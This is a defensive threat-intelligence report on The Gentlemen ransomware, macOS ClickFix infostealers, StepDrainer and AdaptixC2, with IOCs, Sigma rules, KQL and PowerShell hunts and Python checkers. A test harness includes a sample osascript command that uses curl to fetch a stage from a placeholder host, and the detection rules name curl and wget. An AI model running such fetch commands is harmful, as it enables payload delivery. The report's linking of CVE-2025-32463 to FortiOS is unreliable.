
The Gentlemen RaaS, macOS ClickFix & AdaptixC2: Multi-Vector Infostealer & Credential Theft Analysis

Security Arsenal Team
April 21, 2026

Date: 2026-04-21 Source: AlienVault OTX Live Pulse Data Category: Infostealer & Credential Theft Campaigns


Threat Summary

Recent OTX pulses indicate a converging threat landscape in which credential theft is either a precursor to, or a parallel objective of, ransomware operations. The primary actor, The Gentlemen, has aggressively expanded its RaaS operations, exploiting critical vulnerabilities in FortiOS and VMware ESXi to gain initial access before deploying SystemBC for covert C2 tunneling.

Simultaneously, a surge in macOS ClickFix campaigns and the StepDrainer MaaS platform highlights a broad focus on exploiting user psychology to harvest credentials and drain cryptocurrency wallets. The presence of AdaptixC2, a modular post-exploitation framework, suggests that APT groups are increasingly adopting open-source tools to maintain persistence and evade detection in multi-platform environments.

Attack Chain:

  1. Initial Access: Exploitation of CVE-2024-37085 / CVE-2025-32463 (FortiOS) or Social Engineering (Fake CAPTCHA/ClickFix).
  2. Execution: Deployment of AppleScript (macOS) or SystemBC/AdaptixC2 (Windows/Linux).
  3. Persistence: C2 tunneling via SystemBC; Beacon Object Files (BOFs) via AdaptixC2.
  4. Objective: Credential dumping (Mimikatz), browser session hijacking, crypto wallet draining, or ESXi encryption (Ransomware).

Threat Actor / Malware Profile

1. The Gentlemen (RaaS)

  • Type: Ransomware-as-a-Service.
  • Malware Families: Babuk (S0638), Babyk, Vasa Locker, Qilin, LockBit 5.0.
  • Distribution: Exploits public-facing applications (FortiOS/FortiProxy vulnerabilities). Maintains a database of compromised devices.
  • Infrastructure: Uses SystemBC for proxying traffic to hide C2 communication. Utilizes Cobalt Strike and AnyDesk for lateral movement.
  • Targets: Multi-platform (Windows, Linux, NAS, BSD, ESXi).

2. macOS ClickFix Campaign

  • Type: Social Engineering / Infostealer.
  • Distribution: Fake CAPTCHA pages forcing users to execute malicious AppleScript commands.
  • Behavior: Harvests keychain databases, credentials, and session cookies from 12+ browsers and 200+ extensions. Targets 16 cryptocurrency wallets.
  • TTP: Session hijacking, browser data exfiltration.

3. StepDrainer (MaaS)

  • Type: Cryptocurrency Drainer.
  • Behavior: Engineered to steal digital assets (fungible tokens, NFTs) via smart contract interactions. Abuses ERC-20 token permissions and NFT approval mechanisms.
  • Scope: Supports 20+ blockchain networks.
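
The approval abuse described above can be checked for before a wallet signs a transaction. The following is an added example (not StepDrainer code and not from the source pulses): it decodes ERC-20 approve(address,uint256) and ERC-721/ERC-1155 setApprovalForAll(address,bool) calldata and flags unlimited allowances or blanket operator approvals granted to a spender outside an allow-list. The spender address and calldata are constructed placeholders.

```python
from typing import Optional

# 4-byte ABI selectors (first four bytes of keccak256 of the function signature)
SELECTORS = {
    "095ea7b3": "approve(address,uint256)",        # ERC-20 allowance / ERC-721 single-token approval
    "a22cb465": "setApprovalForAll(address,bool)",  # ERC-721 / ERC-1155 operator approval for every token
}
UINT256_MAX = (1 << 256) - 1


def decode_approval(calldata_hex: str) -> Optional[dict]:
    """Decode approve/setApprovalForAll calldata; return None for any other call."""
    data = bytes.fromhex(calldata_hex[2:] if calldata_hex.startswith("0x") else calldata_hex)
    if len(data) < 68:  # selector (4 bytes) + two 32-byte ABI words
        return None
    sig = SELECTORS.get(data[:4].hex())
    if sig is None:
        return None
    spender = "0x" + data[16:36].hex()  # address = low 20 bytes of word 0 (data[4:36])
    word1 = int.from_bytes(data[36:68], "big")
    if sig.startswith("approve"):
        return {"function": sig, "spender": spender, "amount": word1}
    return {"function": sig, "spender": spender, "approved": word1 == 1}


def assess(calldata_hex: str, trusted_spenders: set) -> str:
    """Classify a pending transaction as 'ok', 'review' or 'block' before the wallet signs it."""
    call = decode_approval(calldata_hex)
    if call is None or call["spender"].lower() in trusted_spenders:
        return "ok"
    if call.get("approved"):
        return "block"  # blanket NFT operator approval to an unknown address
    if call.get("amount") == UINT256_MAX:
        return "block"  # unlimited ERC-20 allowance to an unknown address
    return "review"  # bounded allowance or revocation to an unknown address: analyst review


# Constructed sample calldata (placeholder spender address, not a real contract)
def _word(value: int) -> str:
    return format(value, "064x")

SAMPLE_SPENDER = "0x" + "ab" * 20
UNLIMITED_APPROVE = "0x095ea7b3" + _word(int(SAMPLE_SPENDER, 16)) + _word(UINT256_MAX)
SET_APPROVAL_FOR_ALL = "0xa22cb465" + _word(int(SAMPLE_SPENDER, 16)) + _word(1)
SMALL_APPROVE = "0x095ea7b3" + _word(int(SAMPLE_SPENDER, 16)) + _word(10**18)
PLAIN_TRANSFER = "0xa9059cbb" + _word(int(SAMPLE_SPENDER, 16)) + _word(10**18)  # transfer(address,uint256)

if __name__ == "__main__":
    for name, tx in [("unlimited approve", UNLIMITED_APPROVE), ("setApprovalForAll", SET_APPROVAL_FOR_ALL),
                     ("small approve", SMALL_APPROVE), ("transfer", PLAIN_TRANSFER)]:
        print(f"{name:20} -> {assess(tx, set())}")
```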

4. AdaptixC2

  • Type: Post-Exploitation Framework.
  • Capabilities: Written in Go/C++. Supports Windows, macOS, Linux. Uses Beacon Object Files (BOFs).
  • C2: HTTP/S, TCP, mTLS, DNS, DoH, SMB with RC4 encryption. Associated with CloudAtlas and MgBot campaigns.

IOC Analysis

The provided IOCs offer a comprehensive view of the infrastructure supporting these campaigns.

  • CVEs: High-priority patching required for CVE-2024-37085 (VMware ESXi) and CVE-2025-32463 (FortiOS).
  • Domains (StepDrainer/ClickFix): bull-run.fun, spot-wave.fun, moonscan.live, scanclaw.live. These are often used in phishing kits or malicious hosting. SOC teams should sinkhole these domains immediately.
  • File Hashes: Multiple MD5, SHA1, and SHA256 hashes associated with The Gentlemen payloads and AdaptixC2 agents. These should be loaded into EDR quarantine lists.
  • IP Addresses: 172.94.9.250 (Voxility LLP, DE) associated with the macOS ClickFix C2.

Operational Guidance:

  1. Blocklist: Add all domains and IPs to perimeter firewalls and Secure Web Gateways.
  2. Hunt: Use the provided file hashes to scan historical endpoint telemetry for execution artifacts.
  3. Network: Monitor for outbound connections to the specific ASN (AS3223) and the non-standard ports often used by AdaptixC2.

Detection Engineering

Sigma Rules

YAML
---
title: Potential macOS ClickFix AppleScript Execution
id: 8a4b3c1d-5e6f-4a7b-8c9d-0e1f2a3b4c5d
description: Detects the execution of AppleScript via osascript often used in ClickFix campaigns to steal browser data and credentials.
references:
    - https://otx.alienvault.com/pulse/62451d2b5b5f4c2b8e1a5b5f/
author: Security Arsenal
status: experimental
date: 2026/04/21
tags:
    - attack.execution
    - attack.t1059.002
logsource:
    product: macos
    category: process_creation
detection:
    selection:
        Image|endswith: '/osascript'
        CommandLine|contains:
            - 'curl'
            - 'wget'
            - 'http://'
    condition: selection
falsepositives:
    - Legitimate administrator scripts
level: high
---
title: SystemBC Proxy C2 Traffic Pattern
id: 9b5c4d2e-6f7a-5b8c-9d0e-1f2a3b4c5d6e
description: Detects network traffic patterns consistent with SystemBC proxy malware often used by The Gentlemen affiliates for covert tunneling.
references:
    - https://otx.alienvault.com/pulse/62451d2b5b5f4c2b8e1a5b5f/
author: Security Arsenal
status: experimental
date: 2026/04/21
tags:
    - attack.command_and_control
    - attack.t1071.001
logsource:
    category: network_connection
    product: windows
detection:
    selection:
        Initiated: 'true'
        DestinationPort:
            - 80
            - 443
    filter_mainstream:
        DestinationHostname|contains:
            - '.microsoft.com'
            - '.apple.com'
            - '.google.com'
            - '.amazonaws.com'
    condition: selection and not filter_mainstream | count(SourcePort) > 5
falsepositives:
    - High-volume web browsing
level: medium
---
title: AdaptixC2 Process Injection Indicator
id: 0c1d2e3f-7a8b-6c9d-0e1f-2a3b4c5d6e7f
description: Detects potential AdaptixC2 agent behavior characterized by specific process injection techniques often utilizing Go/C++ binaries.
references:
    - https://otx.alienvault.com/pulse/62451d2b5b5f4c2b8e1a5b5f/
author: Security Arsenal
status: experimental
date: 2026/04/21
tags:
    - attack.defense_evasion
    - attack.t1055.001
logsource:
    product: windows
    category: process_creation
detection:
    selection_img:
        Image|endswith:
            - '.exe'
            - '.dll'
    selection_cli:
        CommandLine|contains:
            - '/inject'
            - 'reflective'
    condition: all of selection_*
falsepositives:
    - Legitimate security tools
level: high
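
To see what the first two Sigma rules above actually match, here is an added Python harness (not part of the original advisory) that applies the same selection and filter logic to constructed sample events. Field names follow the rules; the IPs and hostnames are documentation placeholders, and the second rule's count is grouped per destination here, which the rule's condition leaves ungrouped.

```python
from collections import defaultdict

# Constructed macOS process_creation events (not real telemetry)
MACOS_EVENTS = [
    {"Image": "/usr/bin/osascript",
     "CommandLine": "osascript -e 'do shell script \"curl -s http://example.invalid/stage\"'"},
    {"Image": "/usr/bin/osascript", "CommandLine": "osascript /Library/Scripts/backup.scpt"},
    {"Image": "/usr/bin/curl", "CommandLine": "curl -s http://example.invalid/stage"},
]

# Constructed Windows network_connection events: many connections to a bare IP (TEST-NET-3),
# a mainstream destination the filter excludes, and a low-volume destination below threshold
NET_EVENTS = (
    [{"Initiated": "true", "DestinationPort": 443, "DestinationHostname": "",
      "DestinationIp": "203.0.113.10", "SourcePort": 50000 + i} for i in range(7)]
    + [{"Initiated": "true", "DestinationPort": 443, "DestinationHostname": "login.microsoft.com",
        "DestinationIp": "198.51.100.5", "SourcePort": 51000 + i} for i in range(9)]
    + [{"Initiated": "true", "DestinationPort": 80, "DestinationHostname": "",
        "DestinationIp": "203.0.113.20", "SourcePort": 52000 + i} for i in range(3)]
)

DOWNLOAD_MARKERS = ("curl", "wget", "http://")
MAINSTREAM_SUFFIXES = (".microsoft.com", ".apple.com", ".google.com", ".amazonaws.com")


def clickfix_osascript_match(event: dict) -> bool:
    """Rule 1: Image ends with /osascript AND CommandLine contains any download marker."""
    return event["Image"].endswith("/osascript") and any(
        marker in event["CommandLine"] for marker in DOWNLOAD_MARKERS)


def systembc_candidates(events: list, threshold: int = 5) -> dict:
    """Rule 2: for initiated connections on 80/443 not to a mainstream hostname, count
    distinct SourcePort values (Sigma count(field) semantics) and report destinations
    whose count exceeds the threshold."""
    ports_by_dest = defaultdict(set)
    for ev in events:
        if ev["Initiated"] != "true" or ev["DestinationPort"] not in (80, 443):
            continue
        if any(suffix in ev["DestinationHostname"] for suffix in MAINSTREAM_SUFFIXES):
            continue
        ports_by_dest[ev["DestinationIp"]].add(ev["SourcePort"])
    return {ip: len(p) for ip, p in ports_by_dest.items() if len(p) > threshold}


def run() -> tuple:
    """Return (matching osascript command lines, flagged destinations) for the sample events."""
    hits = [ev["CommandLine"] for ev in MACOS_EVENTS if clickfix_osascript_match(ev)]
    return hits, systembc_candidates(NET_EVENTS)


if __name__ == "__main__":
    print(run())
```

Note that Rule 2 fires on any busy non-mainstream destination, so in production it needs a tighter allow-list or a per-destination grouping as shown here.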

KQL Hunt Query (Microsoft Sentinel)

KQL — Microsoft Sentinel / Defender
// Hunt for connections to ClickFix and StepDrainer infrastructure
DeviceNetworkEvents
| where Timestamp > ago(7d)
| where RemoteUrl in~ (
    'bull-run.fun', 
    'spot-wave.fun', 
    'moonscan.live', 
    'scanclaw.live',
    'aodefevrgdkhqltdnwgzbyjoywrlbntbhfwq.com',
    'aahdjjsivunugynqjvyfbhqnjekniyfboma.com'
    )
| summarize Count=count(), FirstSeen=min(Timestamp), LastSeen=max(Timestamp) by DeviceName, RemoteUrl, RemoteIP, InitiatingProcessFileName
| order by Count desc

PowerShell Hunt Script

PowerShell
<#
    Hunt Script: The Gentlemen & AdaptixC2 Artifacts
    Description: Scans endpoint for known file hashes and suspicious process connections.
#>

$TargetHashes = @(
    '3ab9575225e00a83a4ac2b534da5a710bdcf6eb72884944c437b5fbe5c5c9235',
    '51b9f246d6da85631131fcd1fabf0a67937d4bdde33625a44f7ee6a3a7baebd2',
    '7fd19c564761e2c8c9b583cf30db810e313417c7d3572f637f8cedf4d2cc1e91',
    'f212fd00d9ffc0f3d868845f7f4215cb'
)

# The list mixes SHA256 (64 hex chars) and MD5 (32 hex chars) indicators, so each file
# is hashed with the algorithm matching the indicators it is compared against.
$Sha256Targets = @($TargetHashes | Where-Object { $_.Length -eq 64 })
$Md5Targets    = @($TargetHashes | Where-Object { $_.Length -eq 32 })

Write-Host "[*] Scanning for The Gentlemen and AdaptixC2 IOCs..."

$Drives = Get-PSDrive -PSProvider FileSystem

foreach ($Drive in $Drives) {
    Write-Host "Scanning drive $($Drive.Root)..."
    Get-ChildItem -Path $Drive.Root -Recurse -File -ErrorAction SilentlyContinue |
    Where-Object { $_.Length -gt 0kb -and $_.Length -lt 50mb } |
    ForEach-Object {
        $File = $_.FullName
        $Hit = $false
        if ($Sha256Targets.Count -gt 0) {
            $Sha256 = (Get-FileHash -Path $File -Algorithm SHA256 -ErrorAction SilentlyContinue).Hash
            if ($Sha256Targets -contains $Sha256) { $Hit = $true }
        }
        if (-not $Hit -and $Md5Targets.Count -gt 0) {
            $Md5 = (Get-FileHash -Path $File -Algorithm MD5 -ErrorAction SilentlyContinue).Hash
            if ($Md5Targets -contains $Md5) { $Hit = $true }
        }
        if ($Hit) {
            Write-Host "[!] MALICIOUS FILE FOUND: $File" -ForegroundColor Red
        }
    }
}

Write-Host "[*] Checking for unusual process connections (SystemBC/AdaptixC2)..."
$NetTCP = Get-NetTCPConnection -State Established -ErrorAction SilentlyContinue
# RFC 1918 ranges plus IPv4/IPv6 loopback and IPv6 link-local are excluded; every other
# established connection is listed with its owning process for analyst review.
$InternalPattern = '^(127\.|10\.|172\.(1[6-9]|2[0-9]|3[0-1])\.|192\.168\.|::1$|fe80:)'
foreach ($Conn in $NetTCP) {
    try {
        $Process = Get-Process -Id $Conn.OwningProcess -ErrorAction Stop
        if ($Conn.RemoteAddress -notmatch $InternalPattern) {
            Write-Host "[INFO] $($Process.ProcessName) (PID $($Conn.OwningProcess)) connected to $($Conn.RemoteAddress):$($Conn.RemotePort)"
        }
    } catch { continue }
}


---

Response Priorities

Immediate (0-4 Hours):

  • Block IOCs: Immediately block all listed domains (bull-run.fun, spot-wave.fun, moonscan.live) and IPs (172.94.9.250) at the perimeter and proxy level.
  • Patch Management: Prioritize patching for CVE-2024-37085 (VMware ESXi) and CVE-2025-32463 (FortiOS) to prevent The Gentlemen initial access.

24 Hours:

  • Credential Audit: If macOS ClickFix activity is suspected, force a password reset for high-privilege users and revoke active browser sessions.
  • Endpoint Hunt: Run the PowerShell hunt script across the fleet to identify dropped payloads associated with AdaptixC2 or The Gentlemen.

1 Week:

  • Architecture Hardening: Review and restrict external access to management interfaces (ESXi, FortiGate). Implement strict application allow-listing for macOS endpoints to prevent unauthorized AppleScript execution.
  • Crypto Wallet Policy: Enforce cold-storage policies for high-value digital assets given the prevalence of StepDrainer and ClickFix.
